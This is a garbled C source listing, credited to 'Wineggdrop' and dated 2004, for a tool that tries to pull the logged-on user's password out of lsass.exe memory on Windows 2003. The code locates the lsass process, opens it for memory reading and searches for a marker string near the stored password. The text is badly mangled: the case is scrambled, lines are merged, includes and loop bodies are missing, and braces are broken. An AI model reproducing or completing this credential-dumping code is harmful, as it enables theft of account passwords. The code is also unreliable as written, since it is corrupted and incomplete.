// ******************************************************** ***************************************** // Version: v1.0 // CODER: Wineggdrop // Date Release: 12 / 15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box, The Method // Used Is Pretty unwise, But This May Be The Only Way To Review The // Logon User's Password On Windows 2003. // Test PlatForm : Windows 2003 // Compiled ON: VC 6.0 // ********************************************** ******************************** #include
} // end main () // ----------------------------------------- ------------------------------------------ // Purpose: Search The Memory & Try to get the password // Return Type: int // parameters: // in: char * buffer -> the memory buffer to search // out: const uint nsize -> The size of the memory buffer // Note : The Program Tries To Locate The Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location, But It's Not Always True That // We Will Find The Magic String, Or Even We Find It, The Password May Be located // at some Other place.we Only Look for luck // ---------------------------------- -------------------------------------------------- INT Search (Char * Buffer, const uint nsize) {uint offset = 0; uint i = 0; uint j = 0; uint count = 0; if (buffer == null) {RETURN-1;} for (i = 0 ; I 1; IF (strnicmp (& buffer [i offset], "procedure", strlen ("procedure") == 0) {OFFSET = Strlen ("procedure") 1; if (Strnicmp (& Buffer [i offset ], "Call", strlen ("call")) == 0) {i = offset; Break;}}}}}}}}}}}}}}}}}}} {zeromeMEMEMORY (Password, Sizeof (Password)); for ( I // Well, We Fail to Find the password, and this always happens}} // end search // -------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------- ------ // purpose: to get the lsass.exe pid // return type: dword // parameters: none // -------------------- -------------------------------------------------- -------------- DWORD GetLsassPID () {HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE ) {printf ( "Fail To Create Snap Shot / n"); return 0;} pe32.dwSize = sizeof (PROCESSENTRY32); if (Process32First (hProcessSnap, & pe32!)) {CloseHandle (hProcessSnap); // Must clean up the ! snapshot object return 0;} do {if (strcmpi (pe32.szExeFile, "Lsass.EXE") == 0) {PID = pe32.th32ProcessID; break;}} while (Process32Next (hProcessSnap, & pe32)); CloseHandle ( HProcessSnap; Return PID;} // end getlsas SPID () // --------------------------------------------- --------------------------------------- // purpose: to find the password // Return TYPE: Boolean // Parameters: // in: DWORD PID -> The lsass.exe's pid // ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------------- ----- Bool FindPassword (DWORD PID) {Handle HPROCESS = NULL; Char Buffer [5 * 1024] = {0}; DWORD BYTEGET = 0; int found = -1; hprocess = openprocess (Process_VM_READ, FALSE, PID ); // Open process if (hprocess == null) {Printf ("Fail to open process / n"); return false;
